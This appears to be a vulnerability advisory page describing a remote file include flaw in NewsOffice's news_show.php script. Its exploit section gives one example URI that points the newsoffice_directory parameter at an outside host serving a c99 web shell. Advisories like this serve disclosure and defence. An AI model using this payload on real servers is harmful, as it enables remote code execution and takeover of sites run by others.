NewsOffice 'news_show.php' Remote File Include Vulnerability

info
discussion
exploit
solution
references

NewsOffice 'news_show.php' Remote File Include Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/NewsOffice/news_show.php?newsoffice_directory=http://www.example2.com/shells/c99in.txt